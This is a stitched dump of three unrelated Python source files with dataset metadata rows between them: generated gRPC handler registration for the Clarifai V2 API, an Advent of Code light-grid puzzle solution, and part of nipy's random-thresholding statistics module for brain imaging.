def GetStatusCode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_V2Servicer_to_server(servicer, server):
rpc_method_handlers = {
'GetConceptCounts': grpc.unary_unary_rpc_method_handler(
servicer.GetConceptCounts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptCountsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptCountResponse.SerializeToString,
),
'GetConcept': grpc.unary_unary_rpc_method_handler(
servicer.GetConcept,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.SingleConceptResponse.SerializeToString,
),
'ListConcepts': grpc.unary_unary_rpc_method_handler(
servicer.ListConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.ListConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostConceptsSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostConceptsSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsSearchesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PostConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PatchConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PatchConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PatchConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'GetVocab': grpc.unary_unary_rpc_method_handler(
servicer.GetVocab,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.GetVocabRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.SingleVocabResponse.SerializeToString,
),
'ListVocabs': grpc.unary_unary_rpc_method_handler(
servicer.ListVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'PostVocabs': grpc.unary_unary_rpc_method_handler(
servicer.PostVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'PatchVocabs': grpc.unary_unary_rpc_method_handler(
servicer.PatchVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PatchVocabsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'DeleteVocab': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocab,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteVocabs': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'ListVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.ListVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PostVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'DeleteVocabConcept': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabConcept,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetConceptLanguage': grpc.unary_unary_rpc_method_handler(
servicer.GetConceptLanguage,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.GetConceptLanguageRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.SingleConceptLanguageResponse.SerializeToString,
),
'ListConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.ListConceptLanguagesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'PostConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.PostConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PostConceptLanguagesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'PatchConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.PatchConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PatchConceptLanguagesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'ListConceptReferences': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptReferences,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.ListConceptReferencesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.MultiConceptReferenceResponse.SerializeToString,
),
'ListConceptRelations': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptRelations,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__graph__pb2.ListConceptRelationsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'GetInputCount': grpc.unary_unary_rpc_method_handler(
servicer.GetInputCount,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputCountRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputCountResponse.SerializeToString,
),
'StreamInputs': grpc.unary_unary_rpc_method_handler(
servicer.StreamInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.StreamInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'GetInput': grpc.unary_unary_rpc_method_handler(
servicer.GetInput,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputResponse.SerializeToString,
),
'ListInputs': grpc.unary_unary_rpc_method_handler(
servicer.ListInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'PostInputs': grpc.unary_unary_rpc_method_handler(
servicer.PostInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'PatchInputs': grpc.unary_unary_rpc_method_handler(
servicer.PatchInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PatchInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'DeleteInput': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInput,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteInputs': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'PostModelOutputs': grpc.unary_unary_rpc_method_handler(
servicer.PostModelOutputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelOutputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_output__pb2.MultiOutputResponse.SerializeToString,
),
'PostModelFeedback': grpc.unary_unary_rpc_method_handler(
servicer.PostModelFeedback,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelFeedbackRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetModel': grpc.unary_unary_rpc_method_handler(
servicer.GetModel,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'GetModelOutputInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetModelOutputInfo,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'ListModels': grpc.unary_unary_rpc_method_handler(
servicer.ListModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.ListModelsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'PostModelsSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostModelsSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsSearchesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'PostModels': grpc.unary_unary_rpc_method_handler(
servicer.PostModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'PatchModels': grpc.unary_unary_rpc_method_handler(
servicer.PatchModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PatchModelsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'DeleteModel': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModel,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteModels': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'ListModelInputs': grpc.unary_unary_rpc_method_handler(
servicer.ListModelInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListModelInputsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'GetModelVersion': grpc.unary_unary_rpc_method_handler(
servicer.GetModelVersion,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'ListModelVersions': grpc.unary_unary_rpc_method_handler(
servicer.ListModelVersions,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.ListModelVersionsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.MultiModelVersionResponse.SerializeToString,
),
'PostModelVersions': grpc.unary_unary_rpc_method_handler(
servicer.PostModelVersions,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'DeleteModelVersion': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModelVersion,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.DeleteModelVersionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetModelVersionMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GetModelVersionMetrics,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionMetricsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'PostModelVersionMetrics': grpc.unary_unary_rpc_method_handler(
servicer.PostModelVersionMetrics,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionMetricsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'GetWorkflow': grpc.unary_unary_rpc_method_handler(
servicer.GetWorkflow,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.GetWorkflowRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.SingleWorkflowResponse.SerializeToString,
),
'ListWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.ListWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'ListPublicWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.ListPublicWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListPublicWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'PostWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.PostWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'PatchWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.PatchWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PatchWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'DeleteWorkflow': grpc.unary_unary_rpc_method_handler(
servicer.DeleteWorkflow,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.DeleteWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'PostWorkflowResults': grpc.unary_unary_rpc_method_handler(
servicer.PostWorkflowResults,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsResponse.SerializeToString,
),
'PostSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.MultiSearchResponse.SerializeToString,
),
'PostSearchFeedback': grpc.unary_unary_rpc_method_handler(
servicer.PostSearchFeedback,
request_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchFeedbackRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetSubscription': grpc.unary_unary_rpc_method_handler(
servicer.GetSubscription,
request_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.GetSubscriptionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.SerializeToString,
),
'PostSubscription': grpc.unary_unary_rpc_method_handler(
servicer.PostSubscription,
request_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.PostSubscriptionRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.SerializeToString,
),
'GetAppVisualization': grpc.unary_unary_rpc_method_handler(
servicer.GetAppVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetAppVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'GetVisualization': grpc.unary_unary_rpc_method_handler(
servicer.GetVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'PostVisualization': grpc.unary_unary_rpc_method_handler(
servicer.PostVisualization,
request_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.PostVisualizationRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.SerializeToString,
),
'ListStatusCodes': grpc.unary_unary_rpc_method_handler(
servicer.ListStatusCodes,
request_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.ListStatusCodesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.MultiStatusCodeResponse.SerializeToString,
),
'GetStatusCode': grpc.unary_unary_rpc_method_handler(
servicer.GetStatusCode,
request_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.GetStatusCodeRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.SingleStatusCodeResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'clarifai.api.V2', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 53.828622 | 133 | 0.791955 | 6,481 | 60,934 | 6.974387 | 0.035334 | 0.047964 | 0.095927 | 0.113913 | 0.880335 | 0.880335 | 0.837858 | 0.784053 | 0.774894 | 0.700007 | 0 | 0.006795 | 0.145059 | 60,934 | 1,131 | 134 | 53.876216 | 0.86087 | 0.062543 | 0 | 0.431611 | 1 | 0 | 0.103913 | 0.037081 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066869 | false | 0.066869 | 0.016211 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
ef674643de8371e3507eff6315561c7f636cd873 | 3,243 | py | Python | 2015/day_06.py | nabiirah/advent-of-code | 9c7e7cae437c024aa05d9cb7f9211fd47f5226a2 | [
"MIT"
] | 24 | 2020-12-08T20:07:52.000Z | 2022-01-18T20:08:06.000Z | 2015/day_06.py | nestorhf/advent-of-code | 1bb827e9ea85e03e0720e339d10b3ed8c44d8f27 | [
"MIT"
] | null | null | null | 2015/day_06.py | nestorhf/advent-of-code | 1bb827e9ea85e03e0720e339d10b3ed8c44d8f27 | [
"MIT"
] | 10 | 2020-12-04T10:04:15.000Z | 2022-02-21T22:22:26.000Z | """Advent of Code Day 6 - Probably a Fire Hazard"""
import re
# Generate Lights (x, y, 0/1)
lights = []
for x in range(1000):
for y in range(1000):
lights.append([x, y, 0])
with open('inputs/day_06.txt') as f:
instructions = f.readlines()
for instruction in instructions:
# Parse instruction
if 'on' in instruction:
action = 'on'
elif 'off' in instruction:
action = 'off'
if 'toggle' in instruction:
action = 'toggle'
# Isolate coord pairs/coords
coords_regex = re.compile(r'([0-9,]*) through ([0-9,]*)')
first_coords = coords_regex.search(instruction).group(1)
last_coords = coords_regex.search(instruction).group(2)
first_x = int(first_coords.split(',')[0])
last_x = int(last_coords.split(',')[0])
first_y = int(first_coords.split(',')[1])
last_y = int(last_coords.split(',')[1])
# Select specified rectangle
x_offset = last_x - first_x
y_offset = last_y - first_y
for x in range(first_x, first_x + x_offset + 1):
for y in range(first_y, first_y + y_offset + 1):
# Calculate list position
position = x * 1000 + y
if action == 'on':
lights[position] = [x, y, 1]
elif action == 'off':
lights[position] = [x, y, 0]
elif action == 'toggle':
if lights[position][2] == 0:
lights[position] = [x, y, 1]
elif lights[position][2] == 1:
lights[position] = [x, y, 0]
on = 0
for light in lights:
if light[2] == 1:
on += 1
print("Answer One =", on)
lights = []
for x in range(1000):
for y in range(1000):
lights.append([x, y, 0])
for instruction in instructions:
# Parse instruction
if 'on' in instruction:
action = 'on'
elif 'off' in instruction:
action = 'off'
if 'toggle' in instruction:
action = 'toggle'
# Isolate coord pairs/coords
coords_regex = re.compile(r'([0-9,]*) through ([0-9,]*)')
first_coords = coords_regex.search(instruction).group(1)
last_coords = coords_regex.search(instruction).group(2)
first_x = int(first_coords.split(',')[0])
last_x = int(last_coords.split(',')[0])
first_y = int(first_coords.split(',')[1])
last_y = int(last_coords.split(',')[1])
# Select specified rectangle
x_offset = int(last_x) - int(first_x)
y_offset = int(last_y) - int(first_y)
for x in range(first_x, first_x + x_offset + 1):
for y in range(first_y, first_y + y_offset + 1):
# Calculate list position
position = x * 1000 + y
if action == 'on':
brightness = lights[position][2]
lights[position] = [x, y, brightness + 1]
elif action == 'off':
brightness = lights[position][2]
if brightness != 0:
lights[position] = [x, y, brightness - 1]
elif action == 'toggle':
brightness = lights[position][2]
lights[position] = [x, y, brightness + 2]
overall_brightness = 0
for light in lights:
overall_brightness += light[2]
print("Answer Two =", overall_brightness)
| 28.955357 | 61 | 0.563676 | 429 | 3,243 | 4.135198 | 0.160839 | 0.013529 | 0.059188 | 0.063134 | 0.790304 | 0.750846 | 0.72717 | 0.72717 | 0.700113 | 0.642616 | 0 | 0.033407 | 0.298489 | 3,243 | 111 | 62 | 29.216216 | 0.746374 | 0.082023 | 0 | 0.74026 | 1 | 0 | 0.057037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012987 | 0 | 0.012987 | 0.025974 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
32306d781dab4fc19d472d73eb4fc4a02c41835e | 26,205 | py | Python | nipy/labs/utils/random_threshold.py | neurospin/nipy | cc54600a0dca1e003ad393bc05c46f91eef30a68 | [
"BSD-3-Clause"
] | 1 | 2016-03-08T15:01:06.000Z | 2016-03-08T15:01:06.000Z | nipy/labs/utils/random_threshold.py | neurospin/nipy | cc54600a0dca1e003ad393bc05c46f91eef30a68 | [
"BSD-3-Clause"
] | null | null | null | nipy/labs/utils/random_threshold.py | neurospin/nipy | cc54600a0dca1e003ad393bc05c46f91eef30a68 | [
"BSD-3-Clause"
] | null | null | null | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
##############################################################################
# Random Thresholding Procedure (after M. Lavielle and C. Ludena)
import numpy as np
import scipy.stats as st
from nipy.algorithms.graph import wgraph_from_3d_grid
from ..group.routines import add_lines
tol = 1e-10
##############################################################################
# Wrappers
def randthresh_main(Y, K, XYZ=None, p=np.inf, varwind=False, knownull=True,
stop=False, verbose=False):
""" Wrapper for random threshold functions
Parameters
==========
Y: array of shape (n,),Observations
K: int, Some positive integer
(lower bound on the number of null hypotheses)
XYZ: array of shape (3, n) voxel coordinates.
If not empty, connexity constraints are used on the non-null set
p: float, optional, lp norm
varwind: bool,
Varying window variant (vs. fixed window, with width K)
knownull: bool, optional,
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
stop: bool, optional
Stop when minimum is attained (save computation time)
verbose: bool, 'Chatty' mode
Returns
=======
A dictionary D containing the following fields:
"C" (n-K) array Lp norm of partial sums fluctuation
about their conditional expectation
"thresh" <float> Detection threshold
"detect" (k,) Index of detected activations
Note
====
Random thresholding is performed only
if null hypothesis of no activations is rejected at level 5%
"""
if XYZ == None:
return randthresh(Y, K, p, stop, verbose, varwind, knownull)
else:
return randthresh_connex(Y, K, XYZ, p, stop, verbose, varwind,
knownull)
def randthresh(Y, K, p=np.inf, stop=False, verbose=False, varwind=False,
knownull=True):
""" Wrapper for random threshold functions (without connexity constraints)
Parameters
==========
Y: array of shape (n,) Observations
K: int,
Some positive integer (lower bound on the number of null hypotheses)
p: float, lp norm
stop <bool> Stop when minimum is attained (save computation time)
verbose <bool> 'Chatty' mode
varwind <bool> Varying window variant (vs. fixed window, with width K)
knownull <bool>
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
Returns
=======
A dictionary D containing the following fields:
"C" (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"thresh" <float> Detection threshold
"detect" (k,) Index of detected activations
"v" <float> Estimated null variance (if knownull is False)
Note
====
Random thresholding is performed only if
null hypothesis of no activations is rejected at level 5%
"""
D = {}
# Test presence of activity
if knownull:
X = Y
else:
v = np.square(Y).mean()
X = np.clip( - np.log(1 - st.chi2.cdf(Y ** 2, 1, 0, scale=v)), 0,
1 / tol)
D["v"] = v
T = test_stat(X, p=np.inf)
if T <= 0.65:
print "No activity detected at 5% level"
D["detect"] = np.array([])
D["thresh"] = np.inf
else:
# Find optimal threshold
if varwind:
if knownull:
C = randthresh_varwind_knownull(Y, K, p, stop, verbose)
else:
C, V = randthresh_varwind_gaussnull(
Y, K, p, stop, one_sided=False, verbose=verbose)
else:
if knownull:
C = randthresh_fixwind_knownull(Y, K, p, stop, verbose)
else:
C, V = randthresh_fixwind_gaussnull(
Y, K, p, stop, one_sided=False, verbose=verbose)
n = len(X)
if stop:
I = np.where(C > 0)[0]
if len(I) > 0:
ncoeffs = I[-1]
else:
ncoeffs = n - K
else:
I = np.where((C[2:] > C[1:-1]) * (C[1:-1] < C[:-2]))[0]
if len(I) > 0:
ncoeffs = I[np.argmin(C[1: -1][I])] + 1
else:
ncoeffs = n - K
thresh = np.sort(np.abs(Y))[ - ncoeffs]
# Detected activations
detect = np.where(np.abs(Y) > thresh)[0]
D["C"] = C[2:]
D["thresh"] = thresh
D["detect"] = detect
if not knownull:
D["v"] = V[2:]
return D
def randthresh_connex(Y, K, XYZ, p=np.inf, stop=False, verbose=False,
varwind=False, knownull=True):
"""
Wrapper for random threshold functions under connexity constraints
Parameters
==========
Y (n,) Observations
K <int>
Some positive integer (lower bound on the number of null hypotheses)
XYZ (3,n) voxel coordinates
p <float> lp norm
stop <bool> Stop when minimum is attained (save computation time)
verbose <bool> 'Chatty' mode
varwind <bool> Varying window variant (vs. fixed window, with width K)
knownull <bool>
Known null distribution (observations assumed Exp(1) under H0)
versus unknown (observations assumed Gaussian under H0)
Returns
=======
A dictionary D containing the following fields:
"C" (n-K)
Lp norm of partial sums fluctuation about their conditional expectation
"thresh" <float> Detection threshold
"detect" (ncoeffs,) Index of detected voxels
Note
====
Random thresholding is performed only if
null hypothesis of no activations is rejected at level 5%
"""
# Test presence of activity
D = {}
if knownull:
X = Y
else:
v = np.square(Y).mean()
X = np.clip( - np.log(1 - st.chi2.cdf(Y ** 2, 1, 0, scale=v)),
0, 1 / tol)
D["v"] = v
T = test_stat(X, p=np.inf)
if T <= 0.65:
print "No activity detected at 5% level"
D["detect"] = np.array([])
D["thresh"] = np.inf
else:
# Find optimal threshold
if varwind:
if knownull:
C = randthresh_varwind_knownull_connex(
Y, K, XYZ, p, stop, verbose)
else:
C, V = randthresh_varwind_gaussnull_connex(
Y, K, XYZ, p, stop, verbose=verbose)
else:
if knownull:
C = randthresh_fixwind_knownull_connex(
Y, K, XYZ, p, stop, verbose)
else:
C, V = randthresh_fixwind_gaussnull_connex(
Y, K, XYZ, p, stop, verbose=verbose)
n = len(X)
if stop:
I = np.where(C > 0)[0]
if len(I) > 0:
ncoeffs = I[-1]
else:
ncoeffs = n - K
else:
I = np.where((C[2:] > C[1:-1]) * (C[1:-1] < C[:-2]))[0]
if len(I) > 0:
ncoeffs = I[np.argmin(C[1:-1][I])] + 1
else:
ncoeffs = n - K
thresh = np.sort(np.abs(Y))[ - ncoeffs]
detect = np.where(np.abs(Y) > thresh)[0]
# Remove isolated voxels
iso = isolated(XYZ[:, detect])
detect[iso] = -1
detect = detect[detect != -1]
D["C"] = C[2:]
D["thresh"] = thresh
D["detect"] = detect
if knownull == False:
Ynull = np.square(Y).copy()
Ynull[detect] = np.nan
Ynull = Ynull[np.isnan(Ynull) == False]
D["v"] = V[2:]
return D
#########################################################################
# random threshold functions without connexity constraints
def randthresh_fixwind_knownull(X, K, p=np.inf, stop=False, verbose=False):
"""Random threshold with fixed-window and known null distribution
Parameters
==========
X (n,): Observations (must be Exp(1) under H0)
K <int>:
Some positive integer (lower bound on the number of null hypotheses)
p <float>: Lp norm
stop <bool>: Stop when minimum is attained (save computation time)
Returns
=======
C (n-K):
Lp norm of partial sums fluctuation about their conditional expectation
